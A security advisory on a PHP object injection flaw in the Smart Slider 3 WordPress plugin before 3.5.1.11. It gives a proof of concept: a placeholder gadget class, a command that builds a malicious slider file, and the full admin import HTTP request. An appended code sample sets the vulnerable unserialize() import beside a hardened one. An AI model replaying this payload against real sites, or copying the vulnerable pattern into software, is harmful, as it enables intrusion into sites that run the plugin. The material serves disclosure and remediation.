wpvulndb | Nguyen Duy Quoc Khanh | WPVDB-ID: 2E28A4E7-E7D3-485C-949C-E300E5B66CBD
Published: Oct 10, 2022 - 12:00 a.m.

Smart Slider 3 < 3.5.1.11 - PHP Object Injection

Source: wpscan.com
Tags: smart slider 3, php object injection, security issue

EPSS: 0.001 (percentile 42.9%)

The plugin unserialises the content of an imported slider file, which leads to PHP object injection when a user imports (intentionally or not) a malicious file and a suitable gadget chain is present on the site.

PoC

To simulate a gadget chain, put the following code in a plugin:

    class Evil {
        public function __wakeup() : void {
            die("Arbitrary deserialization");
        }
    }

Create a fake slider:

    echo 'O:4:"Evil":0:{};' > data && zip EvilSlider.ss3 data

And import the fake slider in the Smart Slider 3 dashboard:

    POST /wp-admin/admin-ajax.php?action=smart-slider3&nextendcontroller=sliders&nextendaction=import&groupID=0&nextend_nonce=e771567d65 HTTP/1.1
    Host: example.com
    Content-Type: multipart/form-data; boundary=---------------------------304866225113075420131015772767
    Content-Length: 1416
    Cookie: [admin+]

    -----------------------------304866225113075420131015772767
    Content-Disposition: form-data; name="nextend_nonce"

    e771567d65
    -----------------------------304866225113075420131015772767
    Content-Disposition: form-data; name="slider[upload_or_local]"

    0
    -----------------------------304866225113075420131015772767
    Content-Disposition: form-data; name="slider[import-file]"; filename="My project(2).ss3"
    Content-Type: application/octet-stream

    [File data]
    -----------------------------304866225113075420131015772767
    Content-Disposition: form-data; name="selectslider[local-import-file]"


    -----------------------------304866225113075420131015772767
    Content-Disposition: form-data; name="slider[local-import-file]"


    -----------------------------304866225113075420131015772767
    Content-Disposition: form-data; name="slider[delete]"

    0
    -----------------------------304866225113075420131015772767
    Content-Disposition: form-data; name="slider[restore]"

    0
    -----------------------------304866225113075420131015772767
    Content-Disposition: form-data; name="selectslider[image-mode]"

    clone
    -----------------------------304866225113075420131015772767
    Content-Disposition: form-data; name="slider[image-mode]"

    clone
    -----------------------------304866225113075420131015772767--
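As an added example, not the plugin's own code, the import step described above in its vulnerable shape and in a hardened shape; the Evil class and the serialized payload are reused from the PoC, while the function names are assumed.

```php
<?php
// Added example, not the plugin's code: the unserialize() import step from the
// advisory, first as the vulnerable pattern and then hardened. "Evil" and the
// payload come from the PoC above; importSlider* and containsObject are assumed names.

// Stand-in gadget class, as in the PoC (a __wakeup() that aborts the request).
class Evil {
    public function __wakeup(): void { die("Arbitrary deserialization"); }
}

// Constructed payload: the PoC's serialized Evil object (without the trailing ';').
$payload = 'O:4:"Evil":0:{}';

// Vulnerable pattern: default unserialize() instantiates any loaded class named
// in the input and runs its magic methods, so this would reach Evil::__wakeup().
function importSliderVulnerable(string $raw) {
    return unserialize($raw);
}

// Recursively check decoded data for objects, including __PHP_Incomplete_Class.
function containsObject($value): bool {
    if (is_object($value) || $value instanceof __PHP_Incomplete_Class) return true;
    if (is_array($value)) {
        foreach ($value as $item) {
            if (containsObject($item)) return true;
        }
    }
    return false;
}

// Hardened pattern: allowed_classes => false (PHP >= 7.0) turns every object in
// the input into __PHP_Incomplete_Class, so no constructor, __wakeup() or
// __destruct() of a site class runs; anything but plain array data is rejected.
function importSliderHardened(string $raw): array {
    $data = @unserialize($raw, ['allowed_classes' => false]);
    if (!is_array($data) || containsObject($data)) {
        throw new InvalidArgumentException('Rejected slider file: not plain array data');
    }
    return $data;
}

// Demo: the PoC payload is refused, a plain slider export round-trips.
try {
    importSliderHardened($payload);
} catch (InvalidArgumentException $e) {
    echo $e->getMessage(), PHP_EOL;
}
$clean = importSliderHardened(serialize(['title' => 'Home', 'slides' => [1, 2]]));
echo count($clean['slides']), PHP_EOL;
```

Where the export format itself can be changed, writing JSON and reading it back with json_decode($raw, true) removes unserialize() from the import path entirely.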

